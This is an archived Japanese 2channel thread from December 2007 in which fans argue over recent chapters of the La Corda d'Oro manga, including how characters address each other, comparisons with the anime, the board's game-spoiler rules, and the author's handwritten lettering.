なんかひらめいた

呉さんはアレだ
理不尽ギャグがきっと向いてるよ

183 :花と名無しさん:2007/12/02(日) 09:55:42 ID:???O
>>143
香穂子を探すシーンは無いけど、2セレの時、土浦と火原も月森を探したのに、発見したのは香穂子だったよ

184 :花と名無しさん:2007/12/02(日) 10:32:12 ID:???0
>>183
主人公なんだから当たり前だろw
そこで他のキャラが発見してたらブーイングだよw

185 :花と名無しさん:2007/12/02(日) 10:57:49 ID:???0
>>181
ほんと何であそこで呼び方変更なのか分からなかった…
あれなら合宿編で名前呼びさせてた方が
まだ自然だったんじゃないか?

186 :花と名無しさん:2007/12/02(日) 11:37:40 ID:???O
香穂子と冬海ちゃんとの思い出って合宿しかないんじゃないかと
今月号の冬海ちゃんの回想を見て改めて思ったよ

187 :花と名無しさん:2007/12/02(日) 12:17:21 ID:???0
香穂子のことを香穂先輩とか呼ばせるんならせめて天羽ちゃんのことも
菜美先輩と呼ばせないとおかしいと思う。香穂子だけ呼び方変える理由がない
どっちも同じ程度の親しさしかないんだし(それどころかまだ天羽ちゃんとのほうが関わってる)

188 :花と名無しさん:2007/12/02(日) 12:35:49 ID:???0
普段登場すらさせないくせにヒロインマンセーだけさせるなんて
作者はキャラを人間扱いしてないと思う

189 :花と名無しさん:2007/12/02(日) 13:02:35 ID:???0
でもまあたいした絡みもないのに香穂子信者みたいに仕立て上げたアニメに比べたらマシかも
香穂先輩のようになりたいとか香穂先輩のおかげで〜とはモノローグに出てなかったし

190 :花と名無しさん:2007/12/02(日) 13:03:54 ID:???0
>>189
アニメではかなり仲良くしてたと思うが。

191 :花と名無しさん:2007/12/02(日) 13:10:19 ID:???0
アニメだと登場自体多かったからなぁ…冬海も志水も
んでもって香穂子が参加者にそれだけ関心持ってたから
それなりにバランス取れてたけど
漫画の無関心香穂子に皆の矢印が向かってるのは
すごくバランス悪いね

192 :花と名無しさん:2007/12/02(日) 13:15:29 ID:???0
冬海ちゃんは別に矢印出してないだろ引っかかるのは「香穂先輩」だけ。
それにしたって変わろうとするきっかけみたいなもんだから誰でもよかったんだろう。
できれば天羽ちゃんのことも名前呼びに変更してればなおよかったが。
柚木もそれほどは香穂子に関心向けてないようだし(むしろ火原との友情ネタのほうがフラグ立ってる)
そこまで全員ってほどではない。でも志水は確かにアレだな。
ろくにかかわってないのに先輩の音がどうこうばっかり

193 :花と名無しさん:2007/12/02(日) 13:22:42 ID:???0
いや柚木も香穂子気にかけまくってるだろ
火の告白に釘刺したり、3セレで演奏が荒れたのも香穂子の影響っぽく描いてるし

194 :花と名無しさん:2007/12/02(日) 13:27:20 ID:???0
釘刺したのは香穂子とは無関係だと思うけど
最終セレではそうでもなかったし

195 :花と名無しさん:2007/12/02(日) 13:28:23 ID:???0
でも全然妥当性のない指摘だったし
告白を止めたかっただけにしか見えなかったけど

196 :花と名無しさん:2007/12/02(日) 13:30:17 ID:???0
香穂子が気になってるから告白させたくなかったという風には読めない
強いて言うなら今は告白させられないという呉さん側の事情のせいってくらいで

197 :花と名無しさん:2007/12/02(日) 13:30:48 ID:???0
>>192
その「香穂先輩」の直後で演奏聞かないから
どうしてもそういう印象を受けてしまうんじゃない?
しかも今までも一度も聞いてないという背景もある

アニメでもその点を指摘してて、最終セレで香穂子に皆の演奏を
じっくり聞かせる流れだったのに、呉さんは全く気にならないんだろうか…
普通のヴァイオリン弾く苦労はロクに描かないのに
直前で抜けさせる意味がよく分からないなぁどうも

198 :花と名無しさん:2007/12/02(日) 13:32:10 ID:???0
アニメも急きょ伴奏者が変わったから練習とかで抜けてなかったっけ
ちゃんと聞いたのはLRだけだろ?

199 :花と名無しさん:2007/12/02(日) 13:33:51 ID:???0
>>198


200 :花と名無しさん:2007/12/02(日) 13:38:27 ID:???0
>>198
いや全員聞いてたと思うけど。

201 :花と名無しさん:2007/12/02(日) 13:41:53 ID:???0
最終回だろ?控室で庄司さんと音合わせしてなかった?
森さんが怪我して弾けなくなって代わりに庄司さんが伴奏に決まって、
香穂子のために順番変えよう→控え室で練習
スピーカーで聞いてたのかもしれないけど

202 :花と名無しさん:2007/12/02(日) 14:05:56 ID:???0
つーか最終セレじゃなくて3セレだな>全員の演奏聞く

203 :花と名無しさん:2007/12/02(日) 14:17:16 ID:???0
3セレは柚木以外は聞いていて
最終セレは直接聞いてはいなかったけど、それぞれにコメントがあったような…

204 :花と名無しさん:2007/12/02(日) 14:17:49 ID:???0
冬海ちゃんに関してはそこまで香穂子を意識したり慕ってるわけじゃないし
他のやつの演奏は今回一応聞いてるし、問題ないんじゃないの
聞いた上でたいした感想がないやつと感激するやつがいるのも別に問題なし
というか全員に平等に反応してるほうがなんかなあ

205 :花と名無しさん:2007/12/02(日) 14:22:53 ID:???0
>>204
だからこそ、冬海が香穂先輩呼びしたことに違和感を覚えたという話では

206 :花と名無しさん:2007/12/02(日) 14:24:04 ID:???0
描写の仕方が感じ悪いってことだと思うんだが。
香穂子は普通に振舞ってるだけなんだけど
他人を蔑ろにしてるように見える

207 :花と名無しさん:2007/12/02(日) 14:36:37 ID:???0
ネタバレ厳禁

208 :花と名無しさん:2007/12/02(日) 15:39:11 ID:???0
この流れでネタバレなんてしてないじゃん。

209 :花と名無しさん:2007/12/02(日) 15:41:42 ID:???0
アニメもネタバレ扱いされてるからじゃないかと

210 :花と名無しさん:2007/12/02(日) 18:31:57 ID:???0
確かにテンプレに「アニメのネタバレ禁止」ってあるけど
あれって地域によってアニメ放送時間が違うからじゃなかったの?
とっくに終わったアニメで話も漫画は追いついて別になっているのに。
次からとってもいいんじゃないの?


211 :花と名無しさん:2007/12/02(日) 19:25:22 ID:???0
>>210
地域による放送時間の違いではなくて
多分、アニメの展開の中にゲームバレが含まれているからだと思うよ<アニメバレ禁止
テンプレに追加されたのは途中からだったけど…実際それで揉めたことあったし

ここではゲームバレに関してシビアだから、このまま行った方が幸せな気がする

212 :花と名無しさん:2007/12/02(日) 19:46:55 ID:???0
なんで異常にネタバレに厳しいんだろうなここ
漫画だけで面白いと思う奴なんていないとか言ってるくせに
ゲームやらずに漫画だけの読者多いのかよ

213 :花と名無しさん:2007/12/02(日) 20:15:40 ID:???0
>>211
そんな事まで警戒してるのか…
漫画の話題が総合に流れるわけだな

214 :花と名無しさん:2007/12/02(日) 20:32:27 ID:???0
そこまでネタバレ見たくない人は2chなんか見ない方が
いいんじゃないかw

215 :花と名無しさん:2007/12/02(日) 20:38:12 ID:???0
1巻から今月号まで全部読み返してみたけどやっぱり月森が目立ってるなと思った
土浦と火原も出番はちょこちょこあるんだけど目立ち方のタイプが違うというか
香穂子の行動見てても自分から動いてるのはほとんど月森関係だった
あとは柚木の婚約者話はやっぱり浮いてるなというのと、
10巻くらいかかってるのに話ほとんど進んだ気がしないということかw

216 :花と名無しさん:2007/12/02(日) 20:40:28 ID:???0
こいつら一体何がしたいんだ?と思ってしまう

217 :花と名無しさん:2007/12/02(日) 21:16:57 ID:???0
>>212
漫画オンリーの自分がいる。
だけど、ゲームやCDのネタバレがなければ理解できない
行動や言動が多いので、ネタバレは逆に補完できて良い。
ゲームはやろうという気がないので、ゲームのネタバレがあっても
ゲームではそうなんだとしか思わないよ。

218 :花と名無しさん:2007/12/02(日) 21:20:30 ID:???0
>>217
君は私か。ネタバレは補完出来こそすれ嫌だったことはない

219 :花と名無しさん:2007/12/02(日) 21:28:51 ID:???0
以前は、ヴァイオリンがいずれ壊れるとか柚木が実は黒いとか
漫画のあのシーンは恋愛○段階目みたいな話が出ていたから
バレにも敏感になっていたところがあったんだろうけどね
例えば、土浦がなんでピアノから離れていたかの深い事情なんかは
アニメ見てるかゲームやってないと判らないよな
漫画じゃ理不尽な理由があったとしか描かれてないしさ

個人的には、脈略のないバレ投下とか叩き目的の投下でなければ
これまで話の流れで出ることくらい良いと思うんだけどやっぱダメかね
せめて前のルール(名前欄+改行)に戻すとか

220 :花と名無しさん:2007/12/02(日) 21:33:14 ID:???0
話の流れで出るくらいいいんじゃないかと思うんだけどねぇ
ずっとゲーム話が続くのはもちろんいけないが

221 :花と名無しさん:2007/12/02(日) 21:40:24 ID:???0
だったらなんでここがバレ禁止になったの?
少しでも出てくるのなら意味無いよ

222 :花と名無しさん:2007/12/02(日) 21:46:36 ID:???0
だから少しならいいじゃないかって言ってるんだと思うんだが

223 :花と名無しさん:2007/12/02(日) 21:54:27 ID:???0
>>221
香穂子の恋愛相手について議論になったとき、
ゲームスレでもまだバレ解禁になっていないネタが投下され、
アンチも呼び込んでしまってここで延々と論争が繰り広げられた結果
今のルールに

今まで描かれたネタの補完という意味でのバレ話なら
別にあっても構わないんじゃないかと個人的には思ってるよ

224 :花と名無しさん:2007/12/02(日) 21:54:33 ID:???0
自分も流れで少し出るくらいはいいと思うけど
その「少し」の感覚が個人個人で違うからな…
曖昧なのは結局もめる事になると思う

225 :花と名無しさん:2007/12/02(日) 21:54:38 ID:???0
月森留学
土浦指揮者
志水作曲
火原CM出演と教師目指す
柚木ホームレス危機と火原に黒バレ
金澤さらにヘタレ化


226 :花と名無しさん:2007/12/02(日) 21:58:51 ID:???0
…早速呼び込んでしまったか

227 :花と名無しさん:2007/12/02(日) 21:59:28 ID:???0
>>225
氏ね

228 :花と名無しさん:2007/12/02(日) 22:08:07 ID:???0
ホームレスw

229 :花と名無しさん:2007/12/02(日) 22:09:23 ID:???0
>>225
こういうのを呼び込むからバレ厳禁にすべきなのに・・・。
>>223みたいに描かれたネタの補完でも、そこから話が広がるじゃない。


230 :花と名無しさん:2007/12/02(日) 22:10:35 ID:???0
>>1を読めない、守れないヤツはくるな。
バレ禁止だろ?日本語読めないのか?

231 :花と名無しさん:2007/12/02(日) 22:15:17 ID:???0
だからさ、>>225のようなのが投下されても漫画オンリー者には
ネタとしか見えないんだよ。または柚木と金澤を好ましく思ってないとか。

むしろバレてしまうのは>>226>>229の反応で
ゲームのバレなんだなと感づいてしまうんだよ

232 :花と名無しさん:2007/12/02(日) 22:16:32 ID:???0
ここまでタイミングよすぎると何か作為的なものを感じるな

233 :花と名無しさん:2007/12/02(日) 22:18:38 ID:???0
ネタバレOKのマンガスレがあれば問題ないわけだ
実質総合がそうなってるけど、話が続けば漫画スレいけと言い出すやつもいるし
いちいち移動するのめんどくさいんだよな
ここがこんなにうるさいならマンガ専用完全バレスレがあればいいのに

234 :花と名無しさん:2007/12/02(日) 22:19:53 ID:???0
>>223
具体的に言えば、土浦厨の暴走だったよ。
ゲームのエピソードを見て土浦EDしかありえないと一点張りで
誰がなんと言おうと聞き耳持たなくてひたすら土浦マンセー。
そして月森を叩きまくってた。

235 :花と名無しさん:2007/12/02(日) 22:20:45 ID:???0
>>233
気持ちはわかるが、コルダはスレ乱立で迷惑がられているから
必要異常にスレ立ては勘弁

236 :花と名無しさん:2007/12/02(日) 22:34:31 ID:???0
うーん、この調子だとやっぱりここでゲーム話は止めた方が良さそうだね
今は総合もあるからそっちで話せばいいことだし…

>>233
専用スレを設けるまでもないと思うよ
以前に総合でその手の話題も出たことがあったが普通に話していればいいと思う

237 :花と名無しさん:2007/12/02(日) 22:39:35 ID:???0
個人的には、総合で漫画スレ池って誘導入る事がなければ
現状のままでいいと思うんだがな…

238 :花と名無しさん:2007/12/02(日) 22:40:04 ID:???0
じゃあ漫画の話は今後も総合使うのが無難なわけだ

239 :花と名無しさん:2007/12/02(日) 22:44:10 ID:???0
>>238
今は2に入るかどうかってな時期だし吉羅も出てきてるしな
総合で話すのが無難だろう
ゲームバレなしという縛りでここで話せる内容は少ないと思われ

240 :花と名無しさん:2007/12/02(日) 22:49:36 ID:???0
別に2やアンコールのネタバレされたってどうも思わないけどね
漫画オンリーだけど

241 :花と名無しさん:2007/12/02(日) 22:56:20 ID:???0
思う奴がうるさいからここじゃ話せないわけで
基本総合で話すのが無難だと思うよ
関連物も今は少なくなってるから総合の話題の邪魔ということもさほどないだろうし

242 :花と名無しさん:2007/12/02(日) 22:58:49 ID:???0
>>234
今思えばあれのどこがそんなに重要なポイントだったのかと心底疑問
ゲーム中でも地味な扱いだしどこをどうみて決定だと思ったんだかw

243 :花と名無しさん:2007/12/02(日) 23:03:31 ID:???0
別に総合で話しててもいいけど
LaLa発売後も総合でやってると
こっちこいって言われるんだよねー
そのくせゲームバレ禁止ってウザー

244 :花と名無しさん:2007/12/02(日) 23:06:05 ID:???0
土浦と日野は小学校が一緒でお互い知らない状態で土浦のピアノ演奏を聞いてる
それが日野が一番最初に感動した音楽って設定がある。
だから月森の演奏より先に土浦の演奏で感動しているんだよ


245 :花と名無しさん:2007/12/02(日) 23:10:01 ID:???0
>>243
スルーして話してればいいんじゃないの
元々は漫画バレのためのスレだったんじゃないか、あそこ
あんまり言われるようならまた考えればいいし
今の状態だとバレ話抜きで盛り上がりようがないしな
これから2に入っていくわけだし

246 :花と名無しさん:2007/12/02(日) 23:14:02 ID:???0
ま、スルーして話すしかないね

247 :花と名無しさん:2007/12/02(日) 23:18:04 ID:???0
火原の話はもういいと思う。
あいつが絡むとウダウダと暗くなるから。
柚木と火原の友情だけでいいよ。

248 :花と名無しさん:2007/12/02(日) 23:19:29 ID:???0
明るい性格のはずなのに
いつも暗い顔してるイマゲ<火原

249 :花と名無しさん:2007/12/02(日) 23:22:07 ID:???0
今回は何やらブツブツつぶやいていて危ない人だったし>火原

250 :花と名無しさん:2007/12/02(日) 23:22:18 ID:???0
立ち直ったらしいからまたいろんなキャラを巻き込む陽のウザさを発揮してくれるよw
陰のウザさと陽のウザさを併せ持つキャラ火原

251 :花と名無しさん:2007/12/02(日) 23:38:31 ID:???0
呉さんの描く「悩む」という表現がどうも陰気な空気をかもし出しているような
あれが呉さんの画風ということなのかね

252 :花と名無しさん:2007/12/02(日) 23:41:11 ID:???0
見ててあんまり共感とか同情出来る悩みじゃないんだよなぁ…

253 :花と名無しさん:2007/12/03(月) 00:45:42 ID:???0
この先は火原よりも土浦のほうが数段うざくなると思う
個人的にはすでにそうだし

254 :花と名無しさん:2007/12/03(月) 09:51:19 ID:???O
>>249
あのブツブツは、呉さんの手書き文字がなかったら
けっこう印象変わると思う

255 :花と名無しさん:2007/12/03(月) 10:37:50 ID:???0
>>253
私も土浦の自信満々っぷりが鼻につくw
見てると、こいつみたいな奴が期待を裏切られたとき
犯罪を犯すんだよなと思ってしまう
まぁ、ないけどさ

256 :花と名無しさん:2007/12/03(月) 12:20:26 ID:???O
当て馬でも本命でも言動がうざいだろうな
特に当て馬パターンはひどそうだ

257 :花と名無しさん:2007/12/03(月) 12:25:47 ID:???0
>>254
今回の手書き文字、なんかいつもと違う感じがしたけど
あれはアシさんなのか?真剣なシーンであの字体は激しく合わないよ

258 :花と名無しさん:2007/12/03(月) 12:28:12 ID:???O
コミックス収録のときに手直し入ると期待してる

259 :花と名無しさん:2007/12/03(月) 12:40:12 ID:???O
入らないだろ
火原の土浦くんもそのままだったし

260 :花と名無しさん:2007/12/03(月) 12:40:54 ID:???0
でも呉さんてコミクスで何かを直したってこと無くないか?
なので、コミクス収録時に直らないに3000ファータ

261 :260:2007/12/03(月) 12:41:47 ID:???0
>>259
スマソ被った

262 :花と名無しさん:2007/12/03(月) 12:51:19 ID:???O
コミクスの手直しというと、トーン貼ったくらいしか記憶にないなぁ
あとは台詞ミスの修正程度(全部じゃないが)かと

263 :花と名無しさん:2007/12/03(月) 13:31:25 ID:???O
普通そんなもんだろう

264 :花と名無しさん:2007/12/03(月) 20:27:23 ID:???O
>>257
今回も呉さんだと思うよ
毎回手書き文字好きなんだなぁと思いながら読んでるけど
使い方によっては煩わしいだけだな

265 :花と名無しさん:2007/12/03(月) 22:24:28 ID:???0
「え?」とか「ん?」とか、ちょっとした使い方ならいいけど
短い文章になってるから、一気読みするコミクスの時は困る

目が悪いとかじゃなくて、話の流れに乗って読みたいのに
テンポがずれるというか・・

266 :花と名無しさん:2007/12/04(火) 01:25:26 ID:???O
吹き出しを追ってくから、手書き文字でストーリーにかかわる重要なこと書かれると
吹き出しだけじゃ話が通じず何ページか戻るってのが、コルダにはすごく多い。個人的には

267 :花と名無しさん:2007/12/04(火) 15:16:17 ID:???0
今さら今月号を読んだ
今回、手書きの文字が読みにくかった
小さいのに線が太いからコミックスだとさらに読みにくそうだ
あえて強調したいもの以外は普通の字に戻してほしいなぁ
あと、香穂子が舞台袖抜け出す時のリリが志水かとおもた

50 KB
■ このスレッドは過去ログ倉庫に格納されています

★スマホ版★ 掲示板に戻る 全部 前100 次100 最新50

read.cgi ver 05.02.02 2014/06/23 Mango Mangüé ★
FOX ★ DSO(Dynamic Shared Object)